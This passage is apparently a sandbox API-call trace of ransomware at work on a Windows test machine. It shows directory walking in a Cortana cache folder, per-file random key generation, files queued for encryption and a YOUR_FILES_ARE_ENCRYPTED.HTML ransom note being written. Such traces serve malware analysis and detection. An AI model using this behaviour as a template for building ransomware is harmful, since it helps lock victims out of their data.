pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned 199 [0118.916] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned=".html" [0118.916] lstrlenW (lpString=".html") returned 5 [0118.916] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned=".html" [0118.916] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_coobe[1].html"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0118.916] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=18272) returned 1 [0118.916] GetProcessHeap () returned 0x600000 [0118.916] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0118.918] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="1B") returned 2 [0118.918] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="35") returned 2 [0118.919] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="1A") returned 2 [0118.919] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="8C") returned 2 [0118.919] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="A3") returned 2 [0118.919] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="FE") returned 2 [0118.919] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="96") returned 2 [0118.919] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="0C") returned 2 [0118.919] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="74") returned 2 [0118.919] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="77") returned 2 [0118.919] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="15") returned 2 [0118.919] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="5C") returned 2 [0118.919] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="46") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="51") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="6D") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="54") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="04") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="48") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="91") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="11") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="E7") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="BE") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="67") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="FA") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="4A") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="7D") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="2F") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="83") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="2C") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="C7") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="DE") returned 2 [0118.919] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="1B") returned 2 [0118.920] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" [0118.920] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.920] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0118.920] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e2b228d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e2b228d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x39619610, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19c2, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", cAlternateFileName="C__WIN~1.PNG")) returned 1 [0118.920] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.920] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned 204 [0118.920] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned=".png" [0118.920] lstrlenW (lpString=".png") returned 4 [0118.920] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned=".png" [0118.920] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_cortanaicon[1].png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0118.920] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=6594) returned 1 [0118.921] GetProcessHeap () returned 0x600000 [0118.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0118.922] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="EE") returned 2 [0118.922] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="5A") returned 2 [0118.922] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="7C") returned 2 [0118.922] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="7C") returned 2 [0118.922] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="F0") returned 2 [0118.922] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="32") returned 2 [0118.923] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="D9") returned 2 [0118.923] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="5B") returned 2 [0118.923] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="7B") returned 2 [0118.923] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="6D") returned 2 [0118.923] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="5D") returned 2 [0118.923] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="7C") returned 2 [0118.923] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="67") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="4D") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="0C") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="2B") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="D1") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="63") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="90") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="FC") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="C8") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="3B") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="F8") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="6A") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="C5") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="38") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="FD") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="88") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="31") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="01") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="DB") returned 2 [0118.923] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="49") returned 2 [0118.924] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" [0118.924] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.924] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0118.924] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e2b228d, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e2b228d, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x39619610, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19c2, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", cAlternateFileName="C__WIN~1.PNG")) returned 0 [0118.924] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0118.924] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0118.924] GetProcessHeap () returned 0x600000 [0118.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\2\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\2\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.924] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0118.925] CloseHandle (hObject=0x32c) returned 1 [0118.925] GetProcessHeap () returned 0x600000 [0118.925] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.925] GetProcessHeap () returned 0x600000 [0118.925] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0118.925] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec173241, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xec173241, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="6", cAlternateFileName="")) returned 1 [0118.925] StrStrIW (lpFirst="6", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.925] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6") returned 111 [0118.925] GetProcessHeap () returned 0x600000 [0118.926] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0118.926] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6" [0118.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\*" [0118.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec173241, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xec173241, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0118.926] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec173241, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xec173241, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0118.926] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebd9357f, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xebd9357f, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x1046, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="appcache[1].man", cAlternateFileName="APPCAC~1.MAN")) returned 1 [0118.926] StrStrIW (lpFirst="appcache[1].man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.926] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\appcache[1].man") returned 127 [0118.926] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0118.926] lstrlenW (lpString=".man") returned 4 [0118.926] PathFindExtensionW (pszPath="appcache[1].man") returned=".man" [0118.926] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xebd9357f, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebd9357f, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xebd9357f, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0118.926] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.926] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\container.dat") returned 125 [0118.926] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.926] lstrlenW (lpString=".dat") returned 4 [0118.926] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0118.926] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0118.927] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0118.927] CloseHandle (hObject=0x328) returned 1 [0118.927] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebf36f47, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xebf36f47, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x59f07586, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x38ed, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", cAlternateFileName="C_D0E0~1.TXT")) returned 1 [0118.927] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.927] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned 197 [0118.927] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned=".txt" [0118.927] lstrlenW (lpString=".txt") returned 4 [0118.927] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt") returned=".txt" [0118.927] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0118.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_10[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0118.927] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=14573) returned 1 [0118.927] GetProcessHeap () returned 0x600000 [0118.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0118.930] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="8E") returned 2 [0118.930] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="A0") returned 2 [0118.930] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="0C") returned 2 [0118.930] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="76") returned 2 [0118.930] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="0B") returned 2 [0118.930] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="45") returned 2 [0118.930] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="35") returned 2 [0118.930] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="27") returned 2 [0118.930] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="D0") returned 2 [0118.930] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="53") returned 2 [0118.930] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="57") returned 2 [0118.930] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="25") returned 2 [0118.930] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="21") returned 2 [0118.930] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="86") returned 2 [0118.930] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="56") returned 2 [0118.930] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="AD") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="13") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="13") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="7C") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="62") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="B2") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="4B") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="5D") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="B7") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="04") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="0E") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="93") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="0B") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="81") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="87") returned 2 [0118.931] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="E2") returned 2 